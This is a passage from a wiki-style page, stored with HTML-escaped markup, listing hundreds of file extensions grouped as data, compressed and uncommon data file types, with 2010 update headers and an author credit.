.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
